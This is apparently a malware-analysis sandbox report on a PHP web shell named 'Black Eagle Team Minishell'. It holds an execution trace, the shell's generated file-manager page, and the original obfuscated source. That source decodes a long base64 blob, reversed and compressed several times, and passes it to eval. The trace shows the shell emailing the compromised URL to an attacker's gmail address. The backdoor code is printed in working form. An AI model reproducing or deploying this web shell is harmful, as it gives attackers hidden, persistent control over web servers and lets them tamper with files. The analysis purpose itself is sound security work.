3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 $size = 4.336
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 138 $size = '4.336 KB'
4 53 0 0.004668 474888 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/egel.php'
4 53 1 0.004685 474928
4 53 R FALSE
4 54 0 0.004699 474888 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/egel.php'
4 54 1 0.004715 474928
4 54 R TRUE
4 55 0 0.004728 474888 perms 1 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/egel.php'
5 56 0 0.004742 474888 fileperms 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/egel.php'
5 56 1 0.004755 474928
5 56 R 33204
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 $perms = 33204
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 161 $info = '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 175 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 177 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 178 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 180 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 181 $info .= '-'
4 55 1 0.004889 474928
4 55 R '-rw-rw-r--'
4 57 0 0.004903 474888 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/egel.php'
4 57 1 0.004920 474928
4 57 R FALSE
4 58 0 0.004934 474888 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/egel.php'
4 58 1 0.004950 474928
4 58 R TRUE
4 59 0 0.004963 474888 filemtime 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/egel.php'
4 59 1 0.004977 474928
4 59 R 1676260328
4 60 0 0.004990 474832 date 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676260328
4 60 1 0.005022 475160
4 60 R '12-Feb-2023 22:52'
4 61 0 0.005038 474896 is_file 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.005054 474944
4 61 R TRUE
4 62 0 0.005068 474904 filesize 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/prepend.php'
4 62 1 0.005083 474944
4 62 R 57
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 133 $size = 0.0556640625
4 63 0 0.005107 474800 round 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 2 0.0556640625 3
4 63 1 0.005122 474872
4 63 R 0.056
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 134 $size = 0.056
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 138 $size = '0.056 KB'
4 64 0 0.005160 474904 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/prepend.php'
4 64 1 0.005176 474944
4 64 R FALSE
4 65 0 0.005190 474904 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/prepend.php'
4 65 1 0.005206 474944
4 65 R TRUE
4 66 0 0.005220 474904 perms 1 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/prepend.php'
5 67 0 0.005233 474904 fileperms 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
5 67 1 0.005248 474944
5 67 R 33261
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 155 $perms = 33261
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 161 $info = '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 175 $info .= 'x'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 177 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 178 $info .= 'x'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 180 $info .= '-'
4 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 181 $info .= 'x'
4 66 1 0.005377 474944
4 66 R '-rwxr-xr-x'
4 68 0 0.005392 474904 is_writable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/prepend.php'
4 68 1 0.005408 474944
4 68 R FALSE
4 69 0 0.005422 474904 is_readable 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/prepend.php'
4 69 1 0.005438 474944
4 69 R TRUE
4 70 0 0.005451 474904 filemtime 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/prepend.php'
4 70 1 0.005466 474944
4 70 R 1676260328
4 71 0 0.005479 474840 date 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676260328
4 71 1 0.005514 475168
4 71 R '12-Feb-2023 22:52'
4 72 0 0.005540 474952 ini_set 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 188 2 'output_buffering' 0
4 72 1 0.005558 475024
4 72 R FALSE
4 73 0 0.005571 474952 ini_set 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 189 2 'display_errors' 0
4 73 1 0.005587 475024
4 73 R ''
4 74 0 0.005600 474952 set_time_limit 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 190 1 0
4 74 1 0.005616 474984
4 74 R FALSE
4 75 0 0.005629 474952 ini_set 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 191 2 'memory_limit' '64M'
4 75 1 0.005645 475056
4 75 R '128M'
4 76 0 0.005658 474952 header 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 192 1 'Content-Type: text/html; charset=UTF-8'
4 76 1 0.005677 474984
4 76 R NULL
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 193 $to = 'alfredofernandezbutar@gmail.com'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 194 $f31337 = 'http://localhost/uploads/egel.php'
3 A /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 195 $fie = 'Akses http://localhost/uploads/egel.php :p *IP Address : [ 127.0.0.1 ]'
4 77 0 0.005733 475152 mail 0 /var/www/html/uploads/egel.php(10) : eval()'d code(1) : eval()'d code 196 4 'alfredofernandezbutar@gmail.com' 'Papa Yui Chan Dapet Shell Nih : )' 'Akses http://localhost/uploads/egel.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
4 77 1 0.010096 475296
4 77 R FALSE
3 15 1 0.010136 475112
2 7 1 0.010151 428968
0.010193 344912
TRACE END [2023-02-13 01:52:34.599582]
Generated HTML code
<html><head>
<meta name="robots" content"noindex.="" nofollow"="">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>Black Eagle Team Minishell</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body><div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>Black Eagle Team Minishell</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><div class="table-div"></div><input id="image" type="hidden"><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 22:52</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"> <input type="submit" value=">>"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/egel.php&path=/var/www/html">egel.php</a></td><td><center>4.336 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 22:52</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="egel.php"><input type="hidden" name="path" value="/var/www/html/egel.php"> <input type="submit" value=">>"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br></body></html>Original PHP code
<?php
/*
By: MR.P4UL / Bo0G3yM4n
IG: @blackeagleteam.id
Mau Ngapain Cukk Mau Recode Yah!
Eitss Tidak Bisa
*/
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
eval(htmlspecialchars_decode(urldecode(base64_decode($p3mu14))));
exit;
?>